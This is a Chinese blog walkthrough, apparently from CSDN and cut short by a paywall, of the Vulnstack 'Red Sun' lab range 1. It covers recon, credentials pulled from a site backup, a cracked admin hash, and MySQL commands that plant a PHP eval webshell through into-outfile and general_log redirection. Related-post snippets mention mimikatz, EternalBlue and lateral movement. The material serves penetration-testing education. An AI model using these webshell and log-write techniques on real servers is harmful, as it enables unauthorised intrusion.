红队攻防知识分享-红日安全团队靶场1

已于 2024-03-02 01:10:07 修改
阅读量9.4k 收藏 53
点赞数 14
CC 4.0 BY-SA版权
分类专栏: CISP-PTE实战模拟 文章标签: 安全
于 2022-03-23 13:33:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/beirry/article/details/123187049
本文介绍了红日安全团队靶场的攻防过程,包括环境搭建、信息收集(如nmap扫描、数据库弱密码利用、XSS攻击)、漏洞利用(如数据库getshell、XSS漏洞、默认密码利用)、后渗透(如CS与MSF联动、提权、内网信息收集)、留后门和痕迹清理。涉及的技术包括phpstudy、mysql、XSS、CS、MSF、mimikatz等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

红队攻防知识分享-红日安全团队靶场1

环境搭建

靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境拓扑图:
请添加图片描述以下是虚拟机网络配置

虚拟机 网络配置
Windows7 x64 VMnet1:192.168.54.128;VMnet2:192.168.52.143
Win2k3 Measploitable VMnet1:192.168.52.141
Windows Server 2008 R2 x64 VMnet1:192.168.52.138
kali VMnet2:192.168.54.129

刚开机时,需要在Windows7中开启phpstudy,phpstudy在c盘下
在这里插入图片描述

信息收集

通过nmap收集到开启的服务有web服务以及mysql服务
在这里插入图片描述
扫描站点
在这里插入图片描述
经过整理得到三条信息:
1)beifen.rar 站点备份压缩包
2)http://192.168.54.128/phpmyadmin/index.php mysql登录后台页面
3)http://192.168.54.128/phpinfo.php php信息

1)备份压缩包里面有一个命名为yxcms的目录
在这里插入图片描述
从这里我们可以得到站点的架构以及信息
在升级日志中可以得知yxcms版本为1.2.1
在这里插入图片描述

在protected中的config文件里得到mysql的账号密码信息
在这里插入图片描述
2)访问mysql,输入账号密码,成功登录
获取到mysql版本信息
在这里插入图片描述

访问newyxcms库中的yx_admin表得到密码168a73655bfecefdb15b14984dd2ad60,猜测应该是做过md5加密,进行解密
在这里插入图片描述
得到密码:949ba59abbe56e05
在这里插入图片描述

3)phpinfo中,通过路径得知该服务器是Windows系统
在这里插入图片描述

通过查询yxcms版本我们进一步获取信息
后台地址,默认账号密码
在这里插入图片描述
查询yxcms1.2.1已知漏洞
在这里插入图片描述

漏洞利用

数据库弱密码,获取getshell

数据库默认密码root这个就不说了,获取getshell。

select '<?php eval($_POST[shell])?>' into outfile '路径' //需要知道绝对路径

在这里插入图片描述
报错,没有权限。

show variables like '%general%'; //查看全局日志是否开启

在这里插入图片描述

set global general_log=on//开启全局日志

在这里插入图片描述

set global general_log_file="c://phpstudy/www/1.php"//指定新的日志路径

在这里插入图片描述

select '<?php eval($_POST[shell])?>'; //查找一句话木马,会将一句话木马记录在全局日志中

最低0.47元/天 解锁文章

200万优质内容无限畅学
2021-7-7红日团队靶场
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
红队攻防知识分享-红日安全团队靶场1-速通版
beirry的博客
04-14 3187
此版本是根据日常实战中来渗透攻击,如果为了学习,建议先看学习版本 外网打点 端口扫描 通过扫描端口得知web站点开启 目录扫描 得到用的数据库是mysql和一个站点的备份文件 通过文件包拼接得到站点url:http://192.168.54.128/yxcms,使用的cms是yxcms,版本为1.2.1 知道yxcms,直接百度找已知漏洞 访问站点后台,尝试默认密码admin,123456 通过百度得知,编辑前台模板的功能可以插入一句话木马,则直接拿webshell, 获取路径,直接在备份包里搜索前台
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
内网渗透——红日靶场
最新发布
2401_88083440的博客
05-23 1383
靶场还是学了很多知识,对于内网也更加得心应手了些,回忆一下整篇打靶的路径:首先是通过Tomcat文件上传,成功获得了docker的shell然后利用docker的权限配置问题,进行了docker逃逸进行了ssh爆破,获得了更加稳定的shell使用frp搭建了代理隧道,期间也解决了一些问题,成功用永恒之蓝打下WIN7加载mimikatz抓取win7账号密码,sid。发现是system权限直接修改本机管理员的密码,打开3389端口登录本机管理员。
红日靶场
qq_26947429的博客
07-28 2502
一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集 三、内网搜集 7.内网--继续信息收集 8.内网攻击姿势--信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞 四、横.
红日靶场1
woshicainiao666的博客
01-13 2441
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 1117
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
极品靶场,多种玩法【实战】红日靶场七:内网综合渗透
Eason_LYC安全白帽子的成长博客
10-19 1250
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
红日靶场1(渗透记录)
b1n的博客
09-12 2225
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
红日靶场1实战经验
YouthBelief的博客
10-27 1万+
红日靶场一0x00前言0x01环境搭建0x02web渗透1 信息收集1.1探测内网存活1.2端口扫描1.2.1 masscan扫描1.2.2 nmap扫描1.2.3 访问80端口1.2.4 目录爆破 看还存在扫描页面服务漏洞利用思路2 漏洞利用2.1 探测phpmyadmin页面2.1 phpmyadmin漏洞利用2.1.1 看是否可以写入文件2.1.2 尝试用日志写入木马getshell2.1.3 蚁剑连接3 拿下webshell后信息收集3.1 是否存在域3.2 网络连接情况 进程 杀软 服务 是否可以
红日靶场1
Barlow_121212的博客
05-14 598
8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。5.查看当前用户权限为administrators,使用CS上线。2. 测试mysql数据库连接密码,并进入phpmyadmin。7.发现其他网段,扫描网段主机,创建代理。4.通过日志写shell,并用蚁剑连接。10.探测域控主机是否开启445端口。3.尝试导入一句话木马,发现拒绝导入。利用方法如法炮制,不在复现。7.使用nmap扫描端口,6.CS 和MSF联合。9.通过远程桌面连接。
红日靶场(一)
qq_58091216的博客
05-01 3443
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
红日安全靶场(一)学习笔记
qq_45244158的博客
09-22 2483
红日安全靶场(一)学习笔记
红日靶场(七)vulnstack7
sagic的博客
04-07 2997
自学网络安全,学习靶场渗透
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_86951299的博客
09-12 1395
1、先判断是否存在域,使用查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org,如下图所示:或者也可以执行命令来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息:2、上面发现 DNS 服务器名为 god.org,当前登录域为 GOD,那接下来可执行查看有几个域(域环境可能存在多个域):3、既然只有一个域,那就利用命令查看域控制器主机名,直接确认域控主机的名称为 OWA:4、已经确认域控主机的名称为 OWA,继续执行命名net view。
Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机
Zeu_s的博客
04-23 956
Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机
内网攻防——红日靶场(一)
2401_88083440的博客
03-15 2243
学校的课程也刚开始学习计网,本人对于以下几点还是需要学习:(1)进程注入的原理(2)如何实现横向(3)路由与代理由于这篇拖太久了,中途遇到了很多问题,导致整篇下来思路有些乱糟糟的,相信之后熟悉了内网渗透了之后会好很多。对于cs和msf工具的使用还得继续学习,多发现一些自己不懂的问题。
红日靶场1(搭建打靶)
qq_73861475的博客
12-17 1056
靶场下载:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员)下载好靶场文件后直接解压直接用虚拟机打开靶场更改网络ip需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)
如何在红队攻防演练中,整合多团队协作以提升网络安全防御能力?
10-27
参考资源链接:[强化网络安全红队实战攻防策略与演变](https://wenku.youkuaiyun.com/doc/1dim9rqhv0?utm_source=wenku_answer2doc_content) 整合多团队协作来提升网络安全防御能力是一个复杂的任务,它需要综合考虑各团队的专长、流程协调以及沟通效率。为了更有效地实现这一目标,建议阅读《强化网络安全红队实战攻防策略与演变》。这本书深入剖析了红队在实战攻防中的角色和策略,它能为多团队协作提供理论和实践的指导。 首先,红队成员需要明确各自的角色和责任,包括安全检查、实时监控、预警、应急响应等。跨团队的协作始于清晰的职责分配和相互之间的信任建立。每个团队都应对其领域内的安全措施负责,如云提供商需确保云服务的安全性,而软件开发商则需确保产品安全性。 其次,实施定期的安全演练和培训,这是提升团队协作效率和安全响应速度的关键。红队成员应共同参与模拟攻击的演习,通过实际操作来锻炼团队的协作和反应能力。这样的演习不仅能够帮助成员熟悉彼此的工作方式,还能在实战中快速识别和修复安全漏洞。 再次,建立高效的沟通机制,确保在攻防演练中各个团队能够实时共享情报和响应策略。使用统一的通信平台和标准化的报告格式有助于快速传达威胁信息和防御措施。 最后,采用先进的技术和工具也是提升防御能力的重要手段。例如,采用自动化威胁检测工具和集成化的安全事件管理平台,可以大大提高团队的分析效率和响应速度。 阅读《强化网络安全红队实战攻防策略与演变》不仅能够让你掌握红队在实战攻防中的策略和演变趋势,还可以帮助你深入理解如何通过多团队协作提升网络安全防御能力。书中还包含大量实战案例分析,提供全面的视角和实用的解决方案,让你在学习后能够更好地应对网络安全的挑战。 参考资源链接:[强化网络安全红队实战攻防策略与演变](https://wenku.youkuaiyun.com/doc/1dim9rqhv0?utm_source=wenku_answer2doc_content)
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值